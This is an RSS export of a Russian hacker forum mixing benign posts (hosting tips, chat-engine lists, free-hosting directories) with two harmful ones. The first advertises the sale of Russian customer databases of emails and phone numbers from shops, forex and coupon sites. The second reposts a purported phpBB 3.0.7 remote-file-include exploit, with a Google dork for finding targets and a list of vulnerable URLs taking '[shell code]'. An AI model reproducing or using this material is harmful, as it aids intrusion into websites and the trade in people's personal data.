<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://forumis.fludilka.su/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Хакерский форум</title>
		<link>https://forumis.fludilka.su/</link>
		<description>Хакерский форум</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 20 Dec 2013 14:20:31 +0400</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Продажа RU баз данных | инет магазины,купоники,форексы,МММ,Мой Мир,Пре</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=30#p30</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://motorodeo.org/img/attention.png&quot; alt=&quot;http://motorodeo.org/img/attention.png&quot; /&gt;&lt;span style=&quot;color: Yellow&quot;&gt;&lt;strong&gt;Внимание:&lt;/strong&gt; &lt;/span&gt;&lt;span style=&quot;color: White&quot;&gt; Наша команда предоставляет только подлинные базы данных клиентов интернет магазинов и прочих проектов. Никаких подделок и парсинга. Всегда легко проверить базу (нажав на сайте (забыл пароль)) Тест всегда предоставим бесплатно. Будьте бдительны покупая у других селлеров (гоняясь за дешевой ценой) часто продают бесплатные базы под видом крупных проектов. &lt;/span&gt; &lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: Yellow&quot;&gt;&lt;strong&gt;[COLOR=Yellow]В наличие:&lt;/span&gt;&lt;/strong&gt;[/COLOR]&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Новые базы за неделю:&lt;/span&gt; 12&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Интернет Магазины одежды:&lt;/span&gt; 11&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Forex базы:&lt;/span&gt; 14&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Купонные сайты:&lt;/span&gt; 8&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Юридические:&lt;/span&gt; 9&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Директора Москвы&lt;/span&gt; 4&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Арендаторы Москвы&lt;/span&gt; 1&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Сервис email и смс рассылки &lt;/span&gt; 4&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;База Артистов и знаменитостей&lt;/span&gt; 1&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Фитнес центр (клубные карты)&lt;/span&gt; 1&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Новостные порталы&lt;/span&gt; 1&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Проект Бизнес Молодость&lt;/span&gt; 1&lt;br /&gt;&lt;span style=&quot;color: DarkOrange&quot;&gt;Другое&lt;/span&gt; 12&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: Yellow&quot;&gt;Персональный аттестат BL135&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;--------------------&lt;br /&gt;&lt;span style=&quot;color: Yellow&quot;&gt;&lt;strong&gt;[COLOR=Yellow]Контакты&lt;/span&gt;&lt;/strong&gt;[/COLOR]&lt;br /&gt;Mail: bazuemail@gmail.com&lt;br /&gt;ICQ: 130930&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: Gray&quot;&gt;Теги: база email ; базы email ; купить базу email ; база мобильных номеров ; купить базу мобильных номеров ; база сайта ; базы сайтов ; база данных сайтов ; база данных ; базы данных ; купить базы данных ; купить базу данных ; база групона ; база данных групона ; скачать база данных групона ; скачать базу email ; купить базу данных групона ; купить базу groupon ; купить базу biglion ; купить базу клиентов ; скачать базу клиентов ; база биглион ; купить базу биглион ; купить базу клиентов Москва ; база данных телефонов ; база данных москвы ; база данных онлайн ; база данных людей ; база данных сайта ; база данных купить ; база данных мобильных телефонов ; база телефонов ; продам базу данных ; базы данных access ; продажа базы данных ; скачать базу данных ; базы данных людей ; купить базу данных предприятий ; база данных жителей украины ; база данных жителей россии ; база данных сотовых телефонов ; база данных жителей москвы ; телефонная база москвы ; база данных москва ; база данных недвижимости москвы ; база данных предприятий ; база данных самара ; жители москвы база данных ; где купить базу данных ; скачать база данных ; купить базу интернет магазина одежды ; купить базу интернет магазина ; купить клиентов интернет магазина ; купить клиентов купонника ; купонный бизнес ; купить базу купонника ; купить базу данных сайта ; купить базу данных email ; купить базу емейл ; продажа интернет магазина ; интернет магазин купить ; цена интернет магазина ; программа рассылки писем ; заказать базу данных ; купонный бизнес ; куплю базу email ; куплю базу клиентов ; куплю базу емейлов ; база интернет магазина ; раскрутка интернет магазина&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Bazuemail)</author>
			<pubDate>Fri, 20 Dec 2013 14:20:31 +0400</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=30#p30</guid>
		</item>
		<item>
			<title>Важно.</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=29#p29</link>
			<description>&lt;p&gt;Советую хостинг arvixe.ru &lt;br /&gt; Сам пользуюсь 7 месяцев, тарифы от 30 руб/мес, 1Гб, трафик 10 Гб, сайтов до 6, баз данных до12 (см. тарифный план), PHP 5, Perl, Python, Ruby on Rails, ImageMagick, NetPBM, GD, Zend Optimizer, всё необходимое для flash видео и др. Техподдержка отличная, сайт всегда доступен, сбой на сервере был 1 раз, в этом году поддерживают русские домены в зоне рф. Я доволен!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (~TwiGZeR~)</author>
			<pubDate>Wed, 05 Oct 2011 17:49:47 +0400</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=29#p29</guid>
		</item>
		<item>
			<title>javagala.ru (Soft)</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=27#p27</link>
			<description>&lt;p&gt;скоро будет&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Tue, 08 Mar 2011 23:19:59 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=27#p27</guid>
		</item>
		<item>
			<title>Движки известных чатов</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=26#p26</link>
			<description>&lt;p&gt;Вот решил напостить чужую статейку, а именно не статья, а список чатов, как бесплатных, так и нет. Вообщем смотрим&#039;с и выбираем. &lt;/p&gt;
						&lt;p&gt;O-Chat- Чат на перле от OLEX&lt;br /&gt;В работе можно посмотреть на chat.evropa.com.ua &lt;br /&gt;Установка, обсуждение и ранние версии O-Chat &lt;br /&gt;Последняя версия доступная для скачивания лежит здесь &lt;br /&gt;Версия 5.0 beta &lt;/p&gt;
						&lt;p&gt;[http://www.internet-technologies.ru/scripts/script_95.html]Andys Chat 4.0[/url]&lt;br /&gt;на PHP&lt;/p&gt;
						&lt;p&gt;COSMO-CHAT v. 2.0&lt;br /&gt;на PHP&lt;/p&gt;
						&lt;p&gt;Pipeys Flash Chat&lt;br /&gt;на APS&lt;br /&gt;Чат на основе АСП - только на Флеше. Исходнике в зипе - можно слегка поменять дизайн, хотя сам дизайн очень приятный на глаз.&lt;/p&gt;
						&lt;p&gt;ChatNetPro v6.0&lt;br /&gt;на Perl&#039;е&lt;br /&gt;- Станица администратора;&lt;br /&gt;- Создание комнат;&lt;br /&gt;- Приватные комната;&lt;br /&gt;- Приватные сообщения;&lt;br /&gt;- Пользователи могут прогонять других со своих комнат;&lt;br /&gt;- Поиск;&lt;br /&gt;- Пересылка картинок;&lt;br /&gt;- Личный профиль пользователя;&lt;br /&gt;- Список участников для каждой комнаты;&lt;br /&gt;- Выбор цветов и шрифтов пользователями;&lt;br /&gt;- Специальные команды (/me /help);&lt;br /&gt;- и т.д. &lt;/p&gt;
						&lt;p&gt;KVCHat by KVCH&lt;br /&gt;(Perl, MySQL) &lt;br /&gt;(платный) &lt;/p&gt;
						&lt;p&gt;JavaScript Lite Perl Chat &lt;br /&gt;(Perl, JS)&lt;/p&gt;
						&lt;p&gt;X7 Chat&lt;/p&gt;
						&lt;p&gt;phpMyChat &lt;br /&gt;обсуждение этого чата &lt;br /&gt;(PHP)&lt;/p&gt;
						&lt;p&gt;Чат на PHP/MySQL&lt;br /&gt;Скачать чат, аддоны и посмотреть инфу к нему можно здесь:&lt;br /&gt;SpxChatEngine &lt;br /&gt;Demo: alphachat.ch &lt;/p&gt;
						&lt;p&gt;ralfchat.sourceforge.net &lt;br /&gt;(Perl, MySQL) &lt;br /&gt;Переводы на русский язык:&lt;br /&gt;Перевод 1 &lt;br /&gt;Перевод 2&lt;/p&gt;
						&lt;p&gt;GTChat &lt;br /&gt;Oбсуждение чата и все проблемы с установкой&lt;br /&gt;(Perl без MySQL)&lt;/p&gt;
						&lt;p&gt;Чат бородина&lt;br /&gt;Интересная и мощная реализация чата&lt;br /&gt;Оффициальный сайт&lt;br /&gt;Demo &lt;br /&gt;(PHP, free) &lt;/p&gt;
						&lt;p&gt;chat.glasnet.ru&lt;br /&gt;(PHP, MySQL)&lt;/p&gt;
						&lt;p&gt;Clatter&lt;br /&gt;Demo&lt;br /&gt;(PHP) &lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;DukChat&lt;br /&gt;(PHP, MySQL) &lt;br /&gt;(платный и бесплатный) &lt;/p&gt;
						&lt;p&gt;Voodoo chat&lt;br /&gt;Установка и обсуждение Voodoo chat &lt;/p&gt;
						&lt;p&gt;PHPOpenChat&lt;br /&gt;(PHP, MySQL) &lt;/p&gt;
						&lt;p&gt;MWChat&lt;br /&gt;Demo&lt;br /&gt;(PHP, MySQL) &lt;/p&gt;
						&lt;p&gt;DigiChat&lt;br /&gt;(Java) &lt;br /&gt;(платный)&lt;/p&gt;
						&lt;p&gt;Chat#One&lt;br /&gt;(нужна регистрация) &lt;/p&gt;
						&lt;p&gt;Gorilla Gab&lt;br /&gt;Немного функций, но очень прост в настройке &lt;br /&gt;(PHP)&lt;/p&gt;
						&lt;p&gt;Monstar chatbox&lt;br /&gt;(PHP)&lt;/p&gt;
						&lt;p&gt;MonoChat&lt;br /&gt;(PHP, MySQL) &lt;/p&gt;
						&lt;p&gt;MLChat&lt;br /&gt;(PHP)&lt;/p&gt;
						&lt;p&gt;med-chat&lt;br /&gt;(PHP, MySQL) &lt;/p&gt;
						&lt;p&gt;Nomia Easy Chat&lt;br /&gt;Простой чат на Perl + файлы &lt;br /&gt;Посмотреть в работе&lt;br /&gt;Скачать последнюю версию &lt;br /&gt;Обсудить &lt;br /&gt;Версия 0.5 &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&amp;lt;!-- бесплатные на C\C++ --&amp;gt; &lt;br /&gt;&lt;a href=&quot;http://www.adevas.com/Chat.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.adevas.com/Chat.html&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.integritymessenger.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.integritymessenger.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://sourceforge.net/projects/yacca/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://sourceforge.net/projects/yacca/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;&amp;lt;!-- Коллекции чатов на PHP: --&amp;gt; &lt;br /&gt;&lt;a href=&quot;http://carline.ru/programm/index.php?action=viewcat&amp;amp;id=96&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://carline.ru/programm/index.php?ac &amp;#8230; &amp;amp;id=96&lt;/a&gt; (3 бесплатных чата) &lt;br /&gt;&lt;a href=&quot;http://www.hotscripts.com/PHP/Scripts_and_Programs/Chat_Scripts/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.hotscripts.com/PHP/Scripts_a &amp;#8230; t_Scripts/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://php.resourceindex.com/Complete_Scripts/Chat/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://php.resourceindex.com/Complete_Scripts/Chat/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;&amp;lt;!-- Колллекции чатов на Perl: --&amp;gt; &lt;br /&gt;&lt;a href=&quot;http://cgi.myweb.ru/catalog.phtml?ca_id=19&amp;amp;cp_level=2&amp;amp;lang=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://cgi.myweb.ru/catalog.phtml?ca_id &amp;#8230; &amp;amp;lang=&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://cgi.resourceindex.com/Programs_and_Scripts/Perl/Chat/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://cgi.resourceindex.com/Programs_a &amp;#8230; Perl/Chat/&lt;/a&gt;&lt;br /&gt;Если ссылки битые, то постите тут, будем исправлять положение.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Tue, 08 Mar 2011 23:13:54 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=26#p26</guid>
		</item>
		<item>
			<title>[Обзор уязвимостей phpBB]</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=25#p25</link>
			<description>&lt;p&gt;&lt;strong&gt;phpBB 3.0.7&lt;/strong&gt;&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;##################################################&amp;#160; ####################&lt;br /&gt;#&lt;br /&gt;# PHPBB Version 3.0.7 Remote File Include !&lt;br /&gt;#&lt;br /&gt;# Author : D.0.M TEAM&lt;br /&gt;#&lt;br /&gt;# Founded By : S3Ri0uS !&lt;br /&gt;#&lt;br /&gt;# We Are : Inj3ct0r.com Exploit and Vulnerability Database.&lt;br /&gt;#&lt;br /&gt;# Public Site : WwWAnti-Secure.CoM !&lt;br /&gt;#&lt;br /&gt;# Security Site : WwWD0M-Security.CoM !&lt;br /&gt;#&lt;br /&gt;# Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !&lt;br /&gt;#&lt;br /&gt;# Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !&lt;br /&gt;#&lt;br /&gt;# SpT : All Iranian Hackers !&lt;br /&gt;#&lt;br /&gt;##################################################&amp;#160; ####################&lt;br /&gt;#&lt;br /&gt;# Dork :&lt;br /&gt;#&lt;br /&gt;# inurl:&amp;amp;quot;powered by PHPBB Version 3.0.7&amp;amp;quot;&lt;br /&gt;#&lt;br /&gt;# Exploit :&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/common.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/common.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/cron.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/cron.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/faq.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/faq.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/feed.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/feed.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/index.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/index.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/mcp.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/mcp.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/memberlist.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/memberlist.php &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/posting.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/posting.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/report.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/report.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/search.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/search.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/style.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/style.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/ucp.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/ucp.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/viewforum.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/viewforum.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/adm/index.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/adm/index.php?phpbb_root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/adm/swatch.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/adm/swatch.php &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/download/file.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/download/file. &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/auth.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/auth. &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/functions.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/funct &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/functions_content.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/funct &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/session.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/sessi &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/template.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/templ &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/acm/acm_file.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/acm/a &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/acp/acp_attachments.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/acp/a &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/utf/utf_tools.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/utf/u &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/ucp/ucp_register.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/ucp/u &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;# &lt;a href=&quot;http://www.site.com/path/includes/ucp/ucp_pm_viewmessage.php?phpbb_root_path=&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.site.com/path/includes/ucp/u &amp;#8230; root_path=&lt;/a&gt;[shell code]&lt;br /&gt;#&lt;br /&gt;##################################################&amp;#160; ####################&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Tue, 08 Mar 2011 23:11:59 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=25#p25</guid>
		</item>
		<item>
			<title>Важно.</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;Джентльменский набор Web-разработчика, набор дистрибутивов (Apache, PHP, MySQL, Perl и т.д.) и программная оболочка, используемые Web-разработчиками для разработки сайтов на «домашней» (локальной) Windows-машине без необходимости выхода в Интернет. Главная особенность Денвера — удобство при удаленной работе сразу над несколькими независимыми проектами и возможность размещения на Flash-накопителе.&lt;br /&gt;Состав базового пакета (PHP 5.3.1, MySQL 5.1, PostgreSQL 8.4 etc.)&lt;br /&gt;Скачать:&lt;br /&gt;&lt;a href=&quot;http://www.denwer.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.denwer.ru/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Tue, 08 Mar 2011 10:40:36 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>Важно.</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=16#p16</link>
			<description>&lt;p&gt;Предлагаю в этой теме выкладывать адреса бесплатных хостингов и их краткое описание.&lt;br /&gt;Оформление как в первом посту.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Яндекс.Народ&amp;quot; - хостинг и хранение файлов&lt;br /&gt;Возможность бесплатно создать сайт, настроить его внешний вид или создать собственный дизайн; загружать и хранить файлы, обмениваться ими.&lt;br /&gt;narod.yandex.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;UcoZ&amp;quot; - бесплатный хостинг и конструктор сайтов &lt;br /&gt;Система управления сайтом с набором сервисов (гостевые книги, форумы, каталоги, голосования и т.д.). Возможность настройки шаблонов, FTP-доступ и др.&lt;br /&gt;wwwucoz.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;Holm.ru&amp;quot; - бесплатный веб-хостинг&lt;br /&gt;Описание предоставляемых сервисов (в т.ч запуск cgi скриптов, доступ к БД MySQL, ftp-доступ к виртуальному серверу). Онлайн-регистрация. FAQ&lt;br /&gt;wwwholm.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;Россия православная&amp;quot; - бесплатный хостинг &lt;br /&gt;Бесплатный хостинг православных сайтов. Условия. Список веб-сервисов. Домены, характеристики сервера. Список размещенных сайтов.&lt;br /&gt;wwworthodoxy.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;Fatal.ru&amp;quot; - бесплатный хостинг&lt;br /&gt;Бесплатное размещении веб-сайтов с использованием своих CGI-скриптов на Perl, PHP, C/C++. (Вроде как требуется инвайт)&lt;br /&gt;wwwfatal.ru &lt;br /&gt;&amp;quot;SiteCity&amp;quot; - разработка и хостинг веб-страниц &lt;br /&gt;Возможность бесплатного автоматического создания домашней страницы по типовому шаблону и размещение ее в интернете. Каталог сайтов участников.&lt;br /&gt;wwwsitecity.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;Virtual avenue&amp;quot; - служба хостинга &lt;br /&gt;Бесплатные услуги хостинга. Поиск по сайтам сервера. Каталог информации и устройств, полезных при организации бизнеса в сети. На англ. яз.&lt;br /&gt;wwwvirtualave.net &lt;/p&gt;
						&lt;p&gt;Hobby.Ru - проект компании &amp;quot;Zenon Н.С.П.&amp;quot; &lt;br /&gt;Бесплатный хостинг для авторов интересных страниц. Рейтинги участников. Архив новостей сервера HOBBY.RU . Правила участия в проекте.&lt;br /&gt;wwwhobby.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;FortuneCity&amp;quot; - бесплатный хостинг веб-страниц &lt;br /&gt;Предоставляется 100 Мб веб-пространства и средства разработки сайтов и блогов. На англ. яз.&lt;br /&gt;wwwfortunecity.com &lt;/p&gt;
						&lt;p&gt;&amp;quot;Mylivepage&amp;quot; - бесплатный хостинг &lt;br /&gt;Социальная сеть построенная на основе конструктора сайтов. Возможность создавать блоги, хранить файлы и картинки.&lt;br /&gt;wwwmylivepage.ru&lt;/p&gt;
						&lt;p&gt;000webhost.com&lt;br /&gt;Свободное место 1500MB&lt;br /&gt;траффик 100Gb\месяц&lt;br /&gt;Поддержка PHP Cron Web Mail &lt;br /&gt;MySQL DB 2&lt;br /&gt;Sub-domains 5&lt;br /&gt;E-mail 5&lt;br /&gt;Бэкап	 есть&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://byethost.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://byethost.com&lt;/a&gt;&lt;br /&gt;Свободное место 5500 MB&lt;br /&gt;траффик 200 Gb\месяц&lt;br /&gt;Поддержка PHP Cron Web Mail &lt;br /&gt;MySQL DB 50&lt;br /&gt;Sub-domains 50 &lt;br /&gt;E-mail 5&lt;br /&gt;Примечание: очень удобная админка. Советую.&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.free-web-host.me/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.free-web-host.me/&lt;/a&gt;&lt;br /&gt;Свободное место 3000 MB&lt;br /&gt;траффик Неограниченно&lt;br /&gt;Поддержка PHP Perl Cron FrontPage Web Mail POP3 Server IMAP Support SMTP Server Custom Error Pages AWStats (Real Time Stats) &lt;br /&gt;MySQL DB Неограниченно&lt;br /&gt;Sub-domains Неограниченно &lt;br /&gt;E-mail 10&lt;br /&gt;Примечание: советую этот хостинг.&lt;/p&gt;
						&lt;p&gt;WALLST.RU&lt;br /&gt;Свободное место 100 MB&lt;br /&gt;траффик Неограниченно&lt;br /&gt;Поддержка PHP MySql &lt;/p&gt;
						&lt;p&gt;&amp;quot;Школьные страницы&amp;quot; - хостинг для школ и гимназий &lt;br /&gt;Web-страницы московских школ, гимназий, центров детского творчества. Бесплатное размещение страниц для образовательных учреждений.&lt;br /&gt;schools.keldysh.ru&lt;/p&gt;
						&lt;p&gt;&amp;quot;Okis.ru&amp;quot; - система создания сайтов &lt;br /&gt;Возможность создавать сайты в визуальном редакторе на основе готовых шаблонов с бесплатным предоставлением хостинга и электронной почты, модулем интернет-магазина и т.д. Правила. Форум поддержки.&lt;br /&gt;wwwokis.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;Hostland.su&amp;quot; - бесплатный хостинг&lt;br /&gt;Хостинг с PHP, Perl, MySQL. Форум поддержки пользователей.&lt;br /&gt;wwwhostland.su &lt;/p&gt;
						&lt;p&gt;&amp;quot;Tut&amp;quot; - бесплатный хостинг веб-страниц &lt;br /&gt;Перечень услуг: бесплатная регистрация домена третьего уровня, хостинг веб-страниц.&lt;br /&gt;wwwtut.ru&lt;/p&gt;
						&lt;p&gt;&amp;quot;ZeroCatch&amp;quot; - услуги хостинга &lt;br /&gt;Возможность бесплатно разместить свой веб-сайт размером до 250 Mb.&lt;br /&gt;www0catch.com&lt;/p&gt;
						&lt;p&gt;&amp;quot;Na.by&amp;quot; - белорусский хостинг&lt;br /&gt;Услуги бесплатного хостинга с PHP, MySQL и др. сервисами. Условия сотрудничества.&lt;br /&gt;wwwna.by &lt;/p&gt;
						&lt;p&gt;&amp;quot;Eclub.lv&amp;quot; - бесплатный хостинг в Латвии &lt;br /&gt;Правила размещения и регистрации сайта. Список сайтов. Форум.&lt;br /&gt;wwweclub.lv &lt;/p&gt;
